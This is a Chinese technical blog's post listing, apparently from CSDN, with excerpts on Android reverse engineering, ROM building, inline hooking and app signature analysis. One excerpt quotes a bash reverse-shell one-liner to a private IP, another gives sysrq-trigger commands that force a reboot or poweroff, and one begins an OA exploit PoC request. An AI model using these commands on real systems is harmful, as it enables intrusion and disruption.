- 博客(53)
- 收藏
- 关注
RSS订阅原创 Android app集成支付宝支付
有一个说是需要在新线程里执行,我对照着文档和demo的代码,猜测不是这个问题,因为本身执行这段代码的已经是新线程了,而且测试再新创建一个线程执行还是同样的错误。搜索到的还有一个:https://blog.csdn.net/qijingwang/article/details/102739536,说是org.apache.http.legacy的问题,测试添加后依然不能解决。而未安装支付宝app时返回4000,弹窗"订单创建失败,请重试”,这个弹窗是自己的代码弹窗的,正确的逻辑应该是打开h5的支付页面。
2023-02-07 18:33:41
694
原创 Android app集成微信支付
鉴于微信支付的文档入口不太容易找到、以及文档中有些逻辑不通或者容易产生歧义或者缺失一些信息的情况,记录下此次接入的流程和需要关注的一些点。使用的是app支付->首先阅读介绍等,了解一些基础的概念和建立共识,大体的在脑中组织微信支付的框架。注册申请id等。支付后端程序员可参考:https://pay.weixin.qq.com/wiki/doc/apiv3/wechatpay/wechatpay-1.shtml。
2023-01-19 16:31:28
1948
原创 miuiv13-redmi-note11TPro-root
好多年不关注这些了,搜索发现多了ab分区、卡刷/OTA包payload.bin等变化。现在再看源码、搜资料自己解包payload.bin等是来不及了。所以还是先看看网上的一些教程吧。
2022-09-30 17:17:42
4069
原创 typora-v0.11.13
22/6/2,重启电脑后打开typora跳转到https://typora.io/#download,记得这个版本不是收费版。所以猜测是不是过期了(当时不确定是否有过期设定)?回退系统时间测试可以打开,恢复时间则不能打开,确定是根据时间戳判定过期。............
2022-06-02 17:30:00
716
原创 cm11修改wifi_mac地址
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。参考find5的部分源码https://github.com/CyanogenMod/android_device_oppo_apq8064-common/tree/cm-11.0/wcnss_oppo大
2022-05-12 00:34:14
695
原创 cm11下的recovery和recovery-cm
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。1:应该是默认使用recovery。界面和cm10.2的好像没什么差异,支持触摸,滑动触摸。2:如果把recovery-cm改名recovery,删除原来的recovery编译完内核就停止了,没看到报错
2022-05-12 00:31:36
157
原创 cm10.2和cm11源码问题集合
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。均以小米2为环境测试。10.2:1:参见ubuntu文档目录的安卓源码编译,下载;cm官方的清单有些安卓分支没有了,需要改分支。2:使用如下分支产生的问题,这个原本是好不容易找到的以前秋叶的cm10.
2022-05-12 00:26:46
790
原创 procsysrq-trigger文件的功能
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。立即重启计算机 echo “b” > /proc/sysrq-trigger立即关闭计算机 echo “o” > /proc/sysrq-trigger导出内存分配的信息
2022-05-12 00:17:58
191
原创 prop属性相关
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。/build/core/Makefile有以下定义:Whether there is default locale set in PRODUCT_PROPERTY_OVERRIDESproduct_pr
2022-05-12 00:16:55
406
原创 readme
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。这个地址的源码包括lk,好像是为高通平台适配的源码,值得参考。参考:http://blog.csdn.net/singleton1900/article/details/8434978 源码可能是4.0的
2022-05-12 00:15:33
290
原创 recovery_minui解说
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。int gr_init(void); /* 初始化图形显示,主要是打开设备、分配内存、初始化一些参数 */ void gr_exit(void); /* 注
2022-05-12 00:12:51
195
原创 sys目录下的一些值
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。这个就是手机电量的值,只读。/sys/class/power_supply/battery/capacity 链接到/sys/devices/platform/msm_ssbi.0/pm8921-core
2022-05-12 00:11:18
142
原创 tmpfs和ccache加速编译
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。1:ccache的设置:export USE_CCACHE=1好像老安卓版本是prebuilt/linux-x86/ccache/ccache -M 20Gprebuilts/misc/linux-x
2022-05-12 00:09:51
525
原创 关机状态下开启adb_root
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。1:小米2原系统只要在default.prop中配置如下即可关机状态下开启adb_root:ro.adb.secure=0ro.secure=0ro.allow.mock.location=0ro.
2022-05-11 23:59:28
2334
原创 米2源码相关
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。1:/device/xiaomi/aries/overlay/frameworks/base/core/res/res/xml/storage_list.xml内容:也许改为如下代码应该有可能开启大容
2022-05-11 23:58:14
158
原创 修改关机充电动画
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。1:充电动画是在/sbin/chargeonlymode这个文件中,以前用修改第一屏的方法替换过里面的充电图片,但是这样是不会动的画面。而官方关机画面中的数字电量其实一张包含数字和%的透明图片,可见处理方式
2022-05-11 23:54:46
1642
原创 android-studio使用library延伸出的问题
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。1:使用正常的项目(在studio中叫module)做library:@1:修改module为library,编辑build.gradle中apply plugin: ‘com.android.appli
2022-05-11 23:45:17
295
原创 桌面和文件管理器右键卡顿几秒的解决办法
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。win10系统,先说下造成卡顿的原因有两个,一是修改了用户名,注意不是计算机管理中的全用户名而是左边的用户名;二是intel核显的应用程序在右键菜单中造成。首先发现这个问题,百度的多数都是说要在注册表中去
2022-05-11 23:40:57
947
原创 win10挂载esp(efi)分区
说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。1:几种分配盘符的方法,但是资源管理器并不显示:@1:下载MountESP@2:mounvol命令挂载,管理员cmd下,例如mounvol m: /sm是盘符,s选项是挂载esp分区。@3:Disk
2022-05-11 23:39:37
4181
原创 win7_ahic改raid
win7_ahic改raid说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。直接bios改raid会蓝屏。http://www.asus.com.cn/support/FAQ/1001448我想使用Intel Smart Response Tech
2022-05-11 23:37:06
808
原创 UEFI安装系统
UEFI安装系统说明应该是2016年之前的记录,之前没有写文档记录的习惯,都是随手记录的txt文件,所以没有图片、格式等。甚至现在看来有些地方逻辑不通(可能还因为年少轻狂,有些偏颇的话语),但是这些与现在的我不重要了,所以也不打算再复现、推理,重新编辑等,仅仅是在旧硬盘中发现,删除之前觉得可能还有点价值,记录下来吧。1:我的步骤如下->硬盘改成gpt,硬盘开头分了个fat的esp分区,DiskGenius提示建的,格式是fat16,因为100多m不纠结格式了。之后是分win10的分区(msr分区
2022-05-11 23:33:50
6388
原创 【win10休眠后几分钟内自动开机的一种解决方法】
win10休眠后几分钟内自动开机的一种解决方法背景系统win10,内存16g,c盘是ssd,剩余空间勉强够休眠文件hiberfil.sys使用。为了第二天快速开始工作以及一些项目不方便保存等情况,基本都是下班休眠,而非关机。最近休眠后,电源灯、硬盘灯也都灭了,但几分钟后电脑会自动开机(未重启,还是休眠前的状态)。再次休眠后有时不再次开机,有时继续开机,因为着急赶最后一班地铁,所以没有深究。后来想起来就休眠前拔掉所有的usb设备,依然是偶现这个问题。隔天查看日志发现夜间休眠、启动循环10几次,这样对固态
2022-03-29 15:20:27
3804
2
原创 android11应用安装目录变更
又变了。。。https://android.googlesource.com/platform/frameworks/base/+/refs/tags/android-platform-11.0.0_r7/services/core/java/com/android/server/pm/PackageManagerService.java#16016/** * Given {@code targetDir}, returns {@code targetDir/~~[randomStrA]/[p
2021-06-30 17:24:53
1297
1
原创 win下Android studio执行sync:你的主机中的软件中止了一个已建立的连接
win下Android studio执行sync:你的主机中的软件中止了一个已建立的连接双网卡开启wifi热点触发,关闭wifi热点可以解决。
2020-12-10 17:58:08
210
1
原创 关于/dev/tcp/host/port
一直没打算接触web、渗透之类的,不过前不久为了搞清楚一个恶意软件的服务端实现(客户端逆完了,但是有些地方只能看服务端实现才能确定猜测是否正确,因为有些场景触发不了),所以现学了一下,拿到了几台Windows服务器和Linux服务器。接触到反弹shell,常见的:bash -i >& /dev/tcp/192.168.146.129/2333 0>&1我能理解这是建立一个tcp连接,不能理解的是搜索了好多都说/dev/tcp/host/port是Linux的特殊文件。。
2020-06-22 13:27:41
1791
2
原创 [已发表,转载勘误]Android upx脱壳
已发在https://www.anquanke.com/post/id/197643不过有部分内容发布之后无法编辑,勘误后如下。Android upx脱壳写在前面因为我不是pc平台过来的,而是直接从Android入门的,所以upx壳其实一开始并不了解,后来接触到,但是可以直接动态调试或者做个内存快照,对我来说加没加upx其实对我逆向分析影响不大。另一方面upx壳因为开源且其实有很多脱壳的教...
2020-03-01 17:25:04
719
原创 如何写一个Android inline hook框架_新增功能或修复bug_浮点相关的问题
之前的hook框架已经可以满足绝大多数需求,但是设计之初未详细的看完arm64下浮点相关的部分,以为和arm一样也是通过通用寄存器、栈传递,现在修复这一部分,这个bug只对dump读写寄存器相关的部分有影响,对replace部分(采用定义一个和被hook函数原型一致的函数)无影响。arm应该不用保存浮点相关的寄存器目前来看arm浮点参数,float参数占用一个寄存器或者栈,double占用相邻...
2020-01-08 12:13:53
504
原创 Android9.0 hook dlopen问题/如何hook dlopen相关函数
Android9.0中在activity的onCreate之前hook dlopen函数,如果需要返回值(即修改了LR寄存器),那么会触发:E/libEGL: EGL_ANDROID_blob_cache advertised, but unable to get eglSetBlobCacheFuncsANDROID。不会crash,但是界面不会绘制出来。是因为dlopen(libEGL_ad...
2020-01-02 12:46:52
3773
2
原创 如何写一个Android inline hook框架
Android_Inline_Hookhttps://github.com/GToad/Android_Inline_Hook_ARM64有32和64的实现,但是是分离的,要用的话还要自己把两份代码合并在一起。缺点:1、不支持函数替换(即hook后不执行原函数),现在只能修改参数寄存器,无法修改返回值。2、不支持定义同类型的hook函数来接受处理参数,只能通过修改寄存器的方式修改参数。...
2020-01-02 12:39:07
1440
2
原创 Android elf hook的方式
got/plt hook自己写了之后觉得,got和plt应该分开更好一些。got hook有爱奇艺的xhook,个人或者github上一些开源的got hook。爱奇艺说是plt hook,个人觉得很疑惑,看实现也是替换got表中的地址值,和plt没太大关系吧。plt hook我知道的应该是Facebook:https://github.com/facebookincubator/profil...
2020-01-02 12:38:35
916
原创 签名
抓包gethttps://api.imdada.cn/v1_0/supplier/city/?userId=0&userModeType=2GET /v1_0/supplier/city/?userId=0&userModeType=2 HTTP/1.1Accuracy: 0User-Token: 1Lng: 0.0Request-Id: 22a13eff-09...
2019-10-18 13:53:10
468
原创 Android应用进程fork出来的子进程能运行虚拟机吗?
今天(几个月前)有人问了这个问题,需求还有些奇葩,想在fork出来的子进程中去运行一部分动态下发的代码,而且不知道动态下发的代码的具体内容,有可能导致崩溃,所以想在子进程中执行。这里不从系统源码和安全上分析,就从写出实现代码,执行,根据异常信息去分析。我们写过双进程反调试,知道fork应用进程去执行是没有问题的,jni调用生成一个字符串之类的也没问题。但是一般的反调试代码都是一个死循环,阻...
2019-10-18 13:37:18
1009
原创 Android 锁屏后不被暂停的奇淫巧计
据说是某狗音乐的方案。现在的情况是锁屏后线程、主进程都停止运行,建立服务置为前台服务,绑定通知都不行。但是一些音乐类软件还能后台播放,所以打开脑洞,一直播放一个无声的音频能不能保持锁屏后进程运行。测试后确实可行。前台服务/绑定通知+循环播放无声音频。public class MService extends Service { Notification notific...
2019-10-14 16:57:34
927
原创 ubuntu18.04创建android studio图标
ubuntu18.04存放图标/快捷方式的位置有三个:1:/usr/share/applications/2:当前用户~/.local/share/applications/3:当前用户~/.gnome/apps/第三个未测试是否其作用,其和其他两个目录下面的desktop文件的区别就是多了一行OnlyShowIn=Old;可知第一个是针对所有用户。一开始...
2019-10-02 02:56:34
579
原创 快手签名
整理了下,发现还有个和达达类似套路的,一起看看吧。抓包发送短信验证码POST /rest/n/user/requestMobileCode?app=0&lon=146.3516&did_gt=1562212339132&c=MYAPP%2C1&sys=ANDROID_8.1&isp=&mod=LGE%28AOSP%20on%20TTOG...
2019-09-07 01:41:48
2753
1
原创 android修改进程名
通过分析Android应用进程的创建启动流程,知道设置应用进程的名称是在http://androidxref.com/4.4_r1/xref/frameworks/base/core/java/android/app/ActivityThread.java#handleBindApplication private void handleBindApplication(AppBi...
2019-08-08 19:47:41
1643
原创 Dvm类加载流程
类加载流程对dex文件进行验证并优化,生成odex文件 对odex文件进行解析,解析生成DexFile数据结构,即将文件形式的数据转换成内存中虚拟机可达的数据 对指定的类进行加载,操作DexFile提取对应类的字节码,生成ClassObject数据结构Dexopt Dalivk中,dex的优化使用的是dexopt,将dex文件优化为Odex文件,最终提交给下一步的加载过程。Odex...
2019-07-17 08:50:04
534
原创 k590s刷bios
下载dos:https://www.xzking.com/html/22795.html,主要是这个是img的,可以直接烧录进u盘。其他的iso虽然全,但是在mac下没什么工具能让做成启动u盘。mac下载https://www.balena.io/etcher/,选择dos.img烧录进u盘。可以启动进dos,但是因为自带的命令有限,所以仅能做很少的操作,好像识别不了硬盘,但是可以再拆入一个u...
2019-07-02 14:48:39
2125
原创 致远OA A8 poc中的编码
从昨天就有这个poc的信息,其实我对web并不关心。今天又被刷屏了,有的说能利用,有的不能,所以看了下。给出的poc如下:POST/seeyon/htmlofficeservletHTTP/1.1Content-Length:1119User-Agent:Mozilla/4.0(compatible;MSIE6.0;WindowsNT5.1;SV1)Host:...
2019-06-27 20:05:25
2602
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人